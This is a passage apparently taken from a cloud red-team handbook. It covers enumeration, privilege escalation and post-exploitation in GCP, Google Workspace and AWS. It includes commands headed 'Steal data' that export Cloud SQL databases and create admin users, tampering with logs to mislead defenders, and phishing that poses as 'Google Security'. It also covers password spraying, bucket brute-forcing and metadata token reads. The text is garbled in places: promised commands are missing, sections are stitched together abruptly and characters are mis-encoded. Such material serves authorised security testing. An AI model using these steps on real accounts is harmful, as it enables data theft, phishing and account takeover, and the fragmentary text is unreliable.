You can then export the virtual disks from any image in multiple formats.
The following command would export the image test-image in qcow2
format, allowing you to download the file and build a VM locally for
further investigation:
# List subnetworks
gcloud compute networks subnets list
gcloud compute networks subnets get-iam-policy <name> --region
<region>
gcloud compute networks subnets describe <name> --region
<region>
You easily find compute instances with open firewall rules with
https://gitlab.com/gitlab-com/gl-security/security-operations/gl-
redteam/gcp_firewall_enum
VPC, Networks & Firewalls in GCP
Compute Instances are connected to VPCs (Virtual Private Clouds). In GCP
there aren't security groups, there are VPC firewalls with rules defined at
this network level but applied to each VM Instance. By default every
network has two implied firewall rules: allow outbound and deny
inbound.
When a GCP project is created, a VPC called default is also reated, with
the following firewall rules:
As you can see, firewall rules tend to be more permissive for internal IP
addresses. The default VPC permits all traffic between Compute Instances.
When attacking from the internet, the default rules don't provide any quick
wins on properly configured machines. It's worth checking for password
authentication on SSH and weak passwords on RDP, of course, but that's a
given.
What we are really interested in is other firewall rules that have been
intentionally applied to an instance. If we're lucky, we'll stumble over an
insecure application, an admin interface with a default password, or
anything else we can exploit.
Network tags
Service accounts
All instances within a VPC
We've automated this completely using this python script which will export
the following:
CSV file showing instance, public IP, allowed TCP, allowed UDP
nmap scan to target all instances on ports ingress allowed from the
public internet (0.0.0.0/0)
masscan to target the full TCP range of those instances that allow ALL
TCP ports from the public internet (0.0.0.0/0)
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/
Enumeration
Privilege Escalation
gcp-compute-privesc.md
Persistence by OS Patching
If you gain access to a service account (either through credentials or by a
default service account on a compute instance/cloud function) if it has the
osconfig.patchDeployments.create permission you can create a patch
deployment. This deployment will run a script on Windows and Linux
compute instances at a defined interval under the context of the OS Config
agent.
Automated tooling such as patchy exists to detect and exploit the presence
of lax permissions on a compute instance or cloud function.
If you want to manually install the patch deployment run the following
gcloud command, a patch boiler plate can be found here:
gcloud compute os-config patch-deployments create my-update --
file=patch.json
Reference
https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching
Privesc
In the following page you can check how to abuse container permissions
to escalate privileges:
gcp-container-privesc.md
Node Pools
These are the pool of machines (nodes) that form the kubernetes clusters.
Privesc
In the following page you can check how to abuse composer permissions
to escalate privileges:
gcp-composer-privesc.md
Kubernetes
For information about what is Kubernetes check this page:
kubernetes-security
First, you can check to see if any Kubernetes clusters exist in your project.
Once this is set up, you can try the following command to get the cluster
configuration.
kubectl cluster-info
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-
privilege-escalation/
However, the technique abused the fact that with the metadata credentials
it was possible to generate a CSR (Certificate Signing Request) for a new
node, which was automatically approved.\ In my test I checked that those
requests aren't automatically approved anymore, so I'm not sure if this
technique is still valid.
curl -v -k http://10.124.200.1:10255/pods
Databases:
Bigquery Enum
Bigtable Enum
Firebase Enum
Firestore Enum
Memorystore (redis & memcache) Enum
Spanner Enum
SQL Enum
bq ls -p #List rojects
bq ls -a #List all datasets
bq ls #List datasets from current project
bq ls <dataset_name> #List tables inside the DB
# Show information
bq show "<proj_name>:<dataset_name>"
bq show "<proj_name>:<dataset_name>.<table_name>"
bq show --encryption_service_account
# Cloud Bigtable
gcloud bigtable instances list
gcloud bigtable instances describe <instance>
gcloud bigtable instances get-iam-policy <instance>
## Clusters
gcloud bigtable clusters list
gcloud bigtable clusters describe <cluster>
## Backups
gcloud bigtable backups list --instance <INSTANCE>
gcloud bigtable backups describe --instance <INSTANCE>
<backupname>
gcloud bigtable backups get-iam-policy --instance <INSTANCE>
<backupname>
## Hot Tables
gcloud bigtable hot-tablets list
## App Profiles
gcloud bigtable app-profiles list --instance <INSTANCE>
gcloud bigtable app-profiles describe --instance <INSTANCE>
<app-prof>
Unauthenticated Enum
Some Firebase endpoints could be found in mobile applications. It is
possible that the Firebase endpoint used is configured badly grating
everyone privileges to read (and write) on it.
1. Get the APK of app you can use any of the tool to get the APK from
the device for this POC.\ You can use “APK Extractor�?
https://play.google.com/store/apps/details?id=com.ext.ui&hl=e
2. Decompile the APK using apktool, follow the below command to
extract the source code from the APK.
3. Go to the res/values/strings.xml and look for this and search for
“firebase�? keyword
4. You may find something like this URL “https://xyz.firebaseio.com/�?
5. Next, go to the browser and navigate to the found URL:
https://xyz.firebaseio.com/.json
6. 2 type of responses can appear:
i. “Permission Denied�?: This means that you cannot access it, so
it's well configured
ii. “null�? response or a bunch of JSON data: This means that the
database is public and you at least have read access.
i. In this case, you could check for writing privileges, an
exploit to test writing privileges can be found here:
https://github.com/MuhammadKhizerJaved/Insecure-
Firebase-Exploit
Alternatively, you can use Firebase Scanner, a python script that automates
the task above as shown below:
python FirebaseScanner.py -f
<commaSeperatedFirebaseProjectNames>
Authenticated Enum
If you have credentials to access the Firebase database you can use a tool
such as Baserunner to access more easily the stored information. Or a
script like the following:
#Taken from https://blog.assetnote.io/bug-
bounty/2020/02/01/expanding-attack-surface-react-native/
import pyrebase
config = {
"apiKey": "FIREBASE_API_KEY",
"authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
"databaseURL":
"https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
"storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}
firebase = pyrebase.initialize_app(config)
db = firebase.database()
print(db.get())
To test other actions on the database, such as writing to the database, refer
to the Pyrebase documentation which can be found here.
Info.plist and you find the API Key and APP ID:
Request
curl -v -X POST
"https://firebaseremoteconfig.googleapis.com/v1/projects/6123456789
09/namespaces/firebase:fetch?key=AIzaSyAs1[...]" -H "Content-Type:
application/json" --data '{"appId":
"1:612345678909:ios:c212345678909876", "appInstanceId": "PROD"}'
References
https://blog.securitybreached.org/2020/02/04/exploiting-insecure-
firebase-database-bugbounty/
https://medium.com/@danangtriatmaja/firebase-database-takover-
b7929bbb62e1
# Memcache
gcloud memcache instances list --region <region>
gcloud memcache instances describe <INSTANCE> --region <region>
# You should try to connect to the memcache instances to access
the data
# Redis
gcloud redis instances list --region <region>
gcloud redis instances describe <INSTACE> --region <region>
gcloud redis instances export gs://my-bucket/my-redis-
instance.rdb my-redis-instance --region=us-central1
# Cloud Spanner
## Instances
gcloud spanner instances list
gcloud spanner instances describe <INSTANCE>
gcloud spanner instances get-iam-policy <INSTANCE>
## Databases
gcloud spanner databases list --instance <INSTANCE>
gcloud spanner databases describe --instance <INSTANCE>
<db_name>
gcloud spanner databases get-iam-policy --instance <INSTANCE>
<db_name>
gcloud spanner databases execute-sql --instance <INSTANCE> --
sql <sql> <db_name>
## Backups
gcloud spanner backups list --instance <INSTANCE>
gcloud spanner backups get-iam-policy --instance <INSTANCE>
<backup_name>
## Instance Configs
gcloud spanner instance-configs list
gcloud spanner instance-configs describe <name>
If you find any of these instances in use with public IP, you could try to
access them from the internet as they might be miss-configured and
accessible.
# Cloud SQL
gcloud sql instances list
gcloud sql databases list -i <INSTANCE>
gcloud sql databases describe -i <INSTANCE> <DB>
gcloud sql backups list -i <INSTANCE>
gcloud sql backups describe -i <INSTANCE> <DB>
# Steal data
## Export
gcloud sql export sql <DATABASE_INSTANCE>
gs://<CLOUD_STORAGE_BUCKET>/cloudsql/export.sql.gz --database
<DATABASE_NAME>
## Clone
gcloud instances clone <SOURCE> <DESTINATION>
## Backup
gcloud sql backups restore BACKUP_ID --restore-instance
<RESTORE_INSTANCE>
gcloud sql instances clone restore-backup <SOURCE>
<DESTINATION>
## Users abuse
gcloud sql users list -i <INSTANCE>
gcloud sql users create SUPERADMIN -i <INSTANCE>
gcloud sql users set-password <USERNAME> -i <INSTANCE> --
password <PWD>
Exfiltrate DB data
As an example, you can follow Google's documentation to exfiltrate a
Cloud SQL database.
# Policies
## A response policy is a collection of selectors that apply to
queries made against one or more virtual private cloud
networks.
gcloud dns response-policies list
## DNS policies control internal DNS server settings. You can
apply policies to DNS servers on Google Cloud Platform VPC
networks you have access to.
gcloud dns policies list
If you find a filestore available in the project, you can mount it from within
your compromised Compute Instance. Use the following command to see if
any exist.
# Instances
gcloud filestore instances list
gcloud filestore instances describe --zone <zone> <name>
# Backups
gcloud filestore backups list
gcloud filestore backups describe --region <region> <backup>
# Policies
gcloud organizations get-iam-policy <org_id>
gcloud resource-manager folders get-iam-policy
gcloud projects get-iam-policy <project-id>
# Principals
## Group Members
gcloud identity groups memberships search-transitive-
memberships [email protected]
# MISC
## Testable permissions in resource
gcloud iam list-testable-permissions --filter "NOT apiDisabled:
true"
## Grantable roles to a resource
gcloud iam list-grantable-roles <project URL>
gcp-iam-privesc.md
There are three ways in which you can impersonate another service
account:
You can use the following command to grant a user the primitive role of
Editor to your existing project:
If you succeeded here, try accessing the web interface and exploring from
there.
This is the highest level you can assign using the gcloud tool.
Org Policies
The IAM policies indicate the permissions principals has over resources via
roles which are assigned granular permissions. Organization policies
restrict how those service can be used or which features are enabled
disabled. This helps in order to improve the least privilege of each resource
in the gcp environment.
There are many more constraints that give you fine-grained control of your
organization's resources. For more information, see the list of all
Organization Policy Service constraints.
Privesc
In the following page you can check how to abuse org policies
permissions to escalate privileges:
gcp-orgpolicy-privesc.md
Having permissions to list the keys this is how you can access them:
Note that changing a secret entry will create a new version, so it's worth
changing the 1 in the command above to a 2 and so on.
Privesc
In the following page you can check how to abuse secretmanager
permissions to escalate privileges:
gcp-secretmanager-privesc.md
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/#reviewing-stackdriver-logging
# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
However, you may have better results asking for a larger set of data,
including older messages. This has some prerequisites and could impact
applications, so make sure you really know what you're doing.
Pub/Sub Lite
Pub/Sub Lite is a messaging service with zonal storage. Pub/Sub Lite
costs a fraction of Pub/Sub and is meant for high volume streaming
pipelines and event-driven system where low cost is the primary
consideration.
# lite-topics
gcloud pubsub lite-topics list
gcloud pubsub lite-topics describe <topic>
gcloud pubsub lite-topics list-subscriptions <topic>
# lite-subscriptions
gcloud pubsub lite-subscriptions list
gcloud pubsub lite-subscriptions describe <subscription>
# lite-reservations
gcloud pubsub lite-reservations list
gcloud pubsub lite-reservations describe <topic>
gcloud pubsub lite-reservations list-topics <topic>
# lite-operations
gcloud pubsub lite-operations list
gcloud pubsub lite-operations describe <topic>
The service account for a Compute Instance only needs WRITE access to
enable logging on instance actions, but an administrator may mistakenly
grant the service account both READ and WRITE access. If this is the
case, you can explore logs for sensitive data.
gcloud logging provides tools to get this done. First, you'll want to see what
types of logs are available in your current project.
# List logs
gcloud logging logs list
NAME
projects/REDACTED/logs/OSConfigAgent
projects/REDACTED/logs/cloudaudit.googleapis.com%2Factivity
projects/REDACTED/logs/cloudaudit.googleapis.com%2Fsystem_event
projects/REDACTED/logs/bash.history
projects/REDACTED/logs/compute.googleapis.com
projects/REDACTED/logs/compute.googleapis.com%2Factivity_log
# Read logs
gcloud logging read [FOLDER]
# Write logs
# An attacker writing logs may confuse the Blue Team
gcloud logging write [FOLDER] [MESSAGE]
# List Buckets
gcloud logging buckets list
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/#reviewing-stackdriver-logging
This can be a MAJOR vector for privilege escalation, as those buckets can
contain secrets.
Privesc
In the following page you can check how to abuse storage permissions to
escalate privileges:
gcp-storage-privesc.md
############################
# Run this tool to find buckets that are open to the public
anywhere
# in your GCP organization.
#
# Enjoy!
############################
if [ -z "$all_users" ]
then
:
else
echo "[!] Open to all users: $bucket"
fi
if [ -z "$all_auth" ]
then
:
else
echo "[!] Open to all authenticated users:
$bucket"
fi
done
done
Note that other cloud resources could be searched for and that some times
these resources are hidden behind subdomains that are pointing them via
CNAME registry.
Public Resources Brute-Force
Buckets, Firebase, Apps & Cloud Functions
https://github.com/initstring/cloud_enum: This tool in GCP brute-force
Buckets, Firebase Realtime Databases, Google App Engine sites, and
Cloud Functions
https://github.com/0xsha/CloudBrute: This tool in GCP brute-force
Buckets and Apps.
Buckets
As other clouds, GCP also offers Buckets to its users. These buckets might
be (to list the content, read, write...).
The following tools can be used to generate variations of the name given
and search for miss-configured buckets with that names:
https://github.com/RhinoSecurityLabs/GCPBucketBrute
If you find that you can access a bucket you might be able to escalate even
further, check:
gcp-public-buckets-privilege-escalation.md
Check Permissions
There are 2 ways to check the permissions over a bucket. The first one is to
ask for them by making a request to
https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam or running
gsutil iam get gs://BUCKET_NAME .
The other option which will always work is to use the testPermissions
endpoint of the bucket to figure out if you have the specified permission,
for example accessing:
https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermis
sions?
permissions=storage.buckets.delete&permissions=storage.buckets.get&
permissions=storage.buckets.getIamPolicy&permissions=storage.bucket
s.setIamPolicy&permissions=storage.buckets.update&permissions=stora
ge.objects.create&permissions=storage.objects.delete&permissions=st
orage.objects.get&permissions=storage.objects.list&permissions=stor
age.objects.update
Escalating
With the “gsutil�? Google Storage CLI program, we can run the following
command to grant “allAuthenticatedUsers�? access to the “Storage
Admin�? role, thus escalating the privileges we were granted to the
bucket:
Hangout Phishing
You might be able to either directly talk with a person just having their
email address or send an invitation to talk. Either way, you can modify an
email account maybe naming it "Google Security" and adding some Google
logos, and the people will think they are talking to google:
https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s
OAuth Phishing
Any of the previous techniques might be used to make the user access a
Google OAuth application that will request the user some access. If the
user trusts the source he might trust the application (even if it's asking for
high privileged permissions).
Note that Google presents an ugly prompt asking warning that the
application is untrusted in several cases and Workspace admins can even
prevent people accepting OAuth applications. More on this in the OAuth
section.
Password Spraying
In order to test passwords with all the emails you found (or you have
generated based in a email name pattern you might have discover) you can
use a tool like https://github.com/ustayready/CredKing which will use
AWS lambdas to change IP address.
Oauth Apps
Google allows to create applications that can interact on behalf users with
several Google services: Gmail, Drive, GCP...
Interesting Scopes
Here you can find a list of all the Google OAuth scopes.
However, even if the app isn't verified there are a couple of ways to not
show that prompt:
This means, that the creator of the document will appear as creator of
any App Script anyone with editor access creates inside of it.
This also means that the App Script will be trusted by the Workspace
environment of the creator of the document.
This also means that if an App Script already existed and people have
granted access, anyone with Editor permission on the doc can modify it
and abuse that access.\ To abuse this you also need people to trigger the
App Script. And one neat trick if to publish the script as a web app. When
the people that already granted access to the App Script access the web
page, they will trigger the App Script (this also works using
<img> tags.
Post-Exploitation
Google Groups Privesc
By default in workspace a group can be freely accessed by any member of
the organization.\ Workspace also allow to grant permission to groups
(even GCP permissions), so if groups can be joined and they have extra
permissions, an attacker may abuse that path to escalate privileges.
You potentially need access to the console to join groups that allow to be
joined by anyone in the org. Check groups information in
https://groups.google.com/all-groups.
Contacts download
From https://contacts.google.com you can download all the contacts of
the user.
Cloudsearch
In https://cloudsearch.google.com/ you can just search through all the
Workspace content (email, drive, sites...) a user has access to. Ideal to
quickly find sensitive information.
Currents
In https://currents.google.com/ you can access a Google Chat, so you
might find sensitive information in there.
Google Drive Mining
When sharing a document yo can specify the people that can access it one
by one, share it with your entire company (or with some specific groups)
by generating a link.
When sharing a document, in the advance setting you can also allow people
to search for this file (by default this is disabled). However, it's important
to note that once users views a document, it's searchable by them.
For sake of simplicity, most of the people will generate and share a link
instead of adding the people that can access the document one by one.
Keep Notes
In https://keep.google.com/ you can access the notes of the user, sensitive
information might be saved in here.
Administrate Workspace
In https://admin.google.com/, you might be able to modify the Workspace
settings of the whole organization if you have enough permissions.
You can also find emails by searching through all the user's invoices in
https://admin.google.com/ac/emaillogsearch
Account Compromised Recovery
Log out of all sessions
Change user password
Generate new 2FA backup codes
Remove App passwords
Remove OAuth apps
Remove 2FA devices
Remove email forwarders
Remove emails filters
Remove recovery email/phones
Remove bad Android Apps
Remove bad account delegations
References
https://www.youtube-nocookie.com/embed/6AsVUS79gLw - Matthew
Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
https://www.youtube.com/watch?v=KTVHLolz6cE - Mike Felch and
Beau Bullock - OK Google, How do I Red Team GSuite?
Concepts such as organization hierarchy, IAM and other basic concepts are
explained in:
aws-basic-information
Labs to learn
https://github.com/RhinoSecurityLabs/cloudgoat
https://hackingthe.cloud/aws/capture_the_flag/cicdont/
https://github.com/BishopFox/iam-vulnerable
http://flaws.cloud/
http://flaws2.cloud/
https://github.com/nccgroup/sadcloud
https://github.com/bridgecrewio/terragoat
https://github.com/ine-labs/AWSGoat
AWS Pentester/Red Team
Methodology
In order to audit an AWS environment it's very important to know: which
services are being used, what is being exposed, who has access to what,
and how are internal AWS services an external services connected.
From a Red Team point of view, the first step to compromise an AWS
environment is to manage to obtain some credentials. Here you have some
ideas on how to do that:
C:\Users\USERNAME\.aws\credentials
aws-unauthenticated-enum-access
Or if you are doing a review you could just ask for credentials with these
roles:
aws-permissions-for-a-pentest.md
After you have managed to obtain credentials, you need to know to who do
those creds belong, and what they have access to, so you need to perform
some basic enumeration:
Basic Enumeration
SSRF
If you found a SSRF in a machine inside AWS check this page for tricks:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf
Whoami
One of the first things you need to know is who you are (in where account
you are in other info about the AWS env):
# Easiest way, but might be monitored?
aws sts get-caller-identity
aws iam get-user # This will get your own user
# From metadata
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H
"X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN"
http://169.254.169.254/latest/dynamic/instance-
identity/document
Note that companies might use canary tokens to identify when tokens are
being stolen and used. It's recommended to check if a token is a canary
token or not before using it.\ For more info check this page.
Org Enumeration
# Get Org
aws organizations describe-organization
aws organizations list-roots
# Get accounts
## List all the accounts without caring about the parent
aws organizations list-accounts
## Accounts from a parent
aws organizations list-accounts-for-parent --parent-id r-lalala
aws organizations list-accounts-for-parent --parent-id ou-n8s9-
8nzv3a5y
IAM Enumeration
If you have enough permissions checking the privileges of each entity
inside the AWS account will help you understand what you and other
identities can do and how to escalate privileges.
If you don't have enough permissions to enumerate IAM, you can steal
bruteforce them to figure them out.\ Check how to do the numeration
and brute-forcing in:
aws-iam-and-sts-enum
Now that you have some information about your credentials (and if you
are a red team hopefully you haven't been detected). It's time to figure out
which services are being used in the environment.\ In the following section
you can check some ways to enumerate some common services.
Services Enumeration, Post-
Exploitation & Persistence
AWS has an astonishing amount of services, in the following page you will
find basic information, enumeration cheatsheets**,** how to avoid
detection, obtain persistence, and other post-exploitation tricks about
some of them:
aws-services
Note that you don't need to perform all the work manually, below in this
post you can find a section about automatic tools.
aws-unauthenticated-enum-access
Privilege Escalation
If you can check at least your own permissions over different resources
you could check if you are able to obtain further permissions. You
should focus at least in the permissions indicated in:
aws-privilege-escalation
Publicly Exposed Services
While enumerating AWS services you might have found some of them
exposing elements to the Internet (VM/Containers ports, databases or
queue services, snapshots or buckets...).\ As pentester/red teamer you
should always check if you can find sensitive information / vulnerabilities
on them as they might provide you further access into the AWS account.
In this book you should find information about how to find exposed AWS
services and how to check them. About how to find vulnerabilities in
exposed network services I would recommend you to search for the
specific service in:
https://book.hacktricks.xyz/
Compromising the Organization
From the root account
When the management account creates new accounts in the organization, a
new role is created in the new account, by default named
OrganizationAccountAccessRole and giving AdministratorAccess policy
to the management account to access the new account.
You cannot find the name of the roles directly, so check all the
custom IAM policies and search any allowing sts:AssumeRole
# Install
gem install aws_recon
# Enumerate
python3 cloudmapper.py collect --profile dev
## Number of resources discovered
python3 cloudmapper.py stats --accounts dev
# Identify admins
## The permissions search for are in https://github.com/duo-
labs/cloudmapper/blob/4df9fd7303e0337ff16a08f5e58f1d46047c4a87/
shared/iam_audit.py#L163-L175
python3 cloudmapper.py find_admins --accounts dev
# Install
pip install cartography
## At the time of this writting you need neo4j version 3.5.*
# Get data
pmapper --profile dev graph create
pmapper --profile dev graph display # Show basic info
# Generate graph
pmapper --profile dev visualize # Generate svg graph file (can
also be png, dot and graphml)
pmapper --profile dev visualize --only-privesc # Only privesc
permissions
# Generate analysis
pmapper --profile dev analysis
## Run queries
pmapper --profile dev query 'who can do iam:CreateUser'
pmapper --profile dev query 'preset privesc *' # Get privescs
with admins
Audit
cloudsploit: CloudSploit by Aqua is an open-source project designed
to allow detection of security risks in cloud infrastructure accounts,
including: Amazon Web Services (AWS), Microsoft Azure, Google
Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub
(It doesn't look for ShadowAdmins).
./index.js --csv=file.csv --console=table --config ./config.js
# Install
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
scout --help
# Get info
scout aws -p dev
# Checks
./prowler -p dev
cs-suite: Cloud Security Suite (uses python2.7 and looks
unmaintained)
Zeus: Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail /
CloudWatch / KMS best hardening practices (looks unmaintained). It
checks only default configured creds inside the system.
Constant Audit
cloud-custodian: Cloud Custodian is a rules engine for managing
public cloud accounts and resources. It allows users to define policies
to enable a well managed cloud infrastructure, that's both secure
and cost optimized. It consolidates many of the adhoc scripts
organizations have into a lightweight and flexible tool, with unified
metrics and reporting.
pacbot: Policy as Code Bot (PacBot) is a platform for continuous
compliance monitoring, compliance reporting and security
automation for the cloud. In PacBot, security and compliance
policies are implemented as code. All resources discovered by PacBot
are evaluated against these policies to gauge policy conformance. The
PacBot auto-fix framework provides the ability to automatically
respond to policy violations by taking predefined actions.
streamalert: StreamAlert is a serverless, real-time data analysis
framework which empowers you to ingest, analyze, and alert on data
from any environment, using data sources and alerting logic you
define. Computer security teams use StreamAlert to scan terabytes of
log data every day for incident detection and response.
DEBUG: Capture AWS cli requests
# Set proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
Accounts
In AWS there is a root account, which is the parent container for all the
accounts for your organization. However, you don't need to use that
account to deploy resources, you can create other accounts to separate
different AWS infrastructures between them.
The management account (the root account) is the account that you
use to create the organization. From the organization's management
account, you can do the following:
Organization Units
Accounts can be grouped in Organization Units (OU). This way, you can
create policies for the Organization Unit that are going to be applied to all
the children accounts. Note that an OU can have other OUs as children.
Note that SCPs only restrict the principals in the account, so other
accounts are not affected. This means having an SCP deny s3:GetObject
will not stop people from accessing a public S3 bucket in your account.
SCP examples:
being disabled
modified.
ARN
Amazon Resource Name is the unique name every resource inside AWS
has, its composed like this:
arn:partition:service:region:account-id:resource-type/resource-
id
arn:aws:elasticbeanstalk:us-west-
1:123456789098:environment/App/Env
Note that there are 4 partitions in AWS but only 3 ways to call them:
From a security point of view, it's recommended to create other users and
avoid using this one.
IAM users
An IAM user is an entity that you create in AWS to represent the person
or application that uses it to interact with AWS. A user in AWS consists
of a name and credentials (password and up to two access keys).
Users can have MFA enabled to login through the console. API tokens of
MFA enabled users aren't protected by MFA. If you want to restrict the
access of a users API keys using MFA you need to indicate in the policy
that in order to perform certain actions MFA needs to be present (example
here).
CLI
Access Key ID: 20 random uppercase alphanumeric characters like
AKHDNAPO86BSHKDIRYT
Secret access key ID: 40 random upper and lowercase characters:
S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to
retrieve lost secret access key IDs).
Whenever you need to change the Access Key this is the process you
should follow:\ Create a new access key -> Apply the new key to
system/application -> mark original one as inactive -> Test and verify new
access key is working -> Delete old access key
You can attach an identity-based policy to a user group so that all of the
users in the user group receive the policy's permissions. You cannot
identify a user group as a Principal in a policy (such as a resource-
based policy) because groups relate to permissions, not authentication, and
principals are authenticated IAM entities.
A user group can contain many users, and a user can belong to
multiple groups.
User groups can't be nested; they can contain only users, not other
user groups.
There is no default user group that automatically includes all users
in the AWS account. If you want to have a user group like that, you
must create it and assign each new user to it.
The number and size of IAM resources in an AWS account, such as the
number of groups, and the number of groups that a user can be a
member of, are limited. For more information, see IAM and AWS STS
quotas.
IAM roles
An IAM role is very similar to a user, in that it is an identity with
permission policies that determine what it can and cannot do in AWS.
However, a role does not have any credentials (password or access keys)
associated with it. Instead of being uniquely associated with one person, a
role is intended to be assumable by anyone who needs it (and have
enough perms). An IAM user can assume a role to temporarily take on
different permissions for a specific task. A role can be assigned to a
federated user who signs in by using an external identity provider instead
of IAM.
Policies
Policy Permissions
Are used to assign permissions. There are 2 types:
Inline Policies
This kind of policies are directly assigned to a user, group or role. Then,
they not appear in the Policies list as any other one can use them.\ Inline
policies are useful if you want to maintain a strict one-to-one relationship
between a policy and the identity that it's applied to. For example, you
want to be sure that the permissions in a policy are not inadvertently
assigned to an identity other than the one they're intended for. When you
use an inline policy, the permissions in the policy cannot be inadvertently
attached to the wrong identity. In addition, when you use the AWS
Management Console to delete that identity, the policies embedded in the
identity are deleted as well. That's because they are part of the principal
entity.
If a principal does not have an explicit deny on them, and a resource policy
grants them access, then they are allowed.
IAM Boundaries
IAM boundaries can be used to limit the permissions a user should have
access to. This way, even if a different set of permissions are granted to the
user by a different policy the operation will fail if he tries to use them.\
This, SCPs and following the least privilege principle are the ways to
control that users doesn't have more permissions than the ones he needs.
Multi-Factor Authentication
It's used to create an additional factor for authentication in addition to
your existing methods, such as password, therefore, creating a multi-factor
level of authentication.\ You can use a free virtual application or a
physical device. You can use apps like google authentication for free to
activate a MFA in AWS.
Identity Federation
Identity federation allows users from identity providers which are
external to AWS to access AWS resources securely without having to
supply AWS user credentials from a valid IAM user account.\ An example
of an identity provider can be your own corporate Microsoft Active
Directory(via SAML) or OpenID services (like Google). Federated access
will then allow the users within it to access AWS.\ AWS Identity Federation
connects via IAM roles.
Trust Relations
AD Admin Center
Full PS API support
AD Recycle Bin
Group Managed Service Accounts
Schema Extensions
No Direct access to OS or Instances
IAM ID Prefixes
In this page you can find the IAM ID prefixed of keys depending on their
nature:
arn:aws:iam::aws:policy/SecurityAudit
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess
codebuild:ListProjects
config:Describe*
cloudformation:ListStacks
logs:DescribeMetricFilters
directconnect:DescribeConnections
dynamodb:ListTables
Misc
CLI Authentication
In order for a regular user authenticate to AWS via CLI you need to have
local credentials. By default you can configure them manually in
~/.aws/credentials or by running aws configure .\ In that file you can
have more than one profile, if no profile is specified using the aws cli, the
one called [default] in that file will be used.\ Example of credentials file
with more than 1 profile:
[default]
aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
aws_secret_access_key = uOcdhof683fbOUGFYEQug8fUGIf68greoihef
[Admin]
aws_access_key_id = AKIA8YDCu7TGTR356SHYT
aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
region = eu-west-2
If you need to access different AWS accounts and your profile was given
access to assume a role inside those accounts, you don't need to call
manually STS every time ( aws sts assume-role --role-arn <role-arn>
[profile acc2]
region=eu-west-2
role_arn=arn:aws:iam::<account-id>:role/<role-path>
role_session_name = <session_name>
source_profile = <profile_with_assume_role>
sts_regional_endpoints = regional
With this config file you can then use aws cli like:
If you are looking for something similar to this but for the browser you can
check the extension AWS Extend Switch Roles.
https://book.hacktricks.xyz/pentesting-web/saml-attacks
5. Create a new role with the permissions the github action need and a
trust policy that trust the provider like:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::0123456789:oidc-
provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:sub": [
"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
],
"token.actions.githubusercontent.com:aud":
"sts.amazonaws.com"
}
}
}
]
}
jobs:
read-dev:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
This policy is correctly indicating than only the EKS cluster with id
20C159CDF6F2349B68846BEC03BE031B can assume the role. However, it's
not indicting which service account can assume it, which means that ANY
service account with a web identity token is going to be able to assume
the role.
"oidc.eks.region-
code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub":
"system:serviceaccount:default:my-service-account",
References
https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-
actions-with-oidc/
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<acc_id>:role/priv-role"
},
"Action": "sts:AssumeRole",
"Condition": {}
}
]
}
The role priv-role in this case, doesn't need to be specifically allowed
to assume that role (with that allowance is enough).
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<acc_id>:root"
},
"Action": "sts:AssumeRole",
"Condition": {}
}
]
}
If you try to assume a role from a different account, the assumed role
must allow it (indicating the role ARN or the external account), and the
role trying to assume the other one MUST to have permissions to assume
it (in this case this isn't optional even if the assumed role is specifying an
ARN).
Confused Deputy Problem
If you allow an external account (A) to access a role in your account, you
will probably have 0 visibility on who can exactly access that external
account. This is a problem, because if another external account (B) can
access the external account (A) it's possible that B will also be able to
access your account.
However, note that this ExternalId "secret" is not a secret, anyone that
can read the IAM assume role policy will be able to see it. But as long as
the external account A knows it, but the external account B doesn't know
it, it prevents B abusing A to access your role.
Example:
{
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Principal": {
"AWS": "Example Corp's AWS Account ID"
},
"Action": "sts:AssumeRole",
"Condition": {
"StringEquals": {
"sts:ExternalId": "12345"
}
}
}
}
References
https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-
deputy.html
AWS has hundreds (if not thousands) of permissions that an entity can be
granted. In this book you can find all the permissions that I know that you
can abuse to escalate privileges, but if you know some path not mentioned
here, please share it.
Apigateway Privesc
Codebuild Privesc
Codepipeline Privesc
Codestar Privesc
Cloudformation Privesc
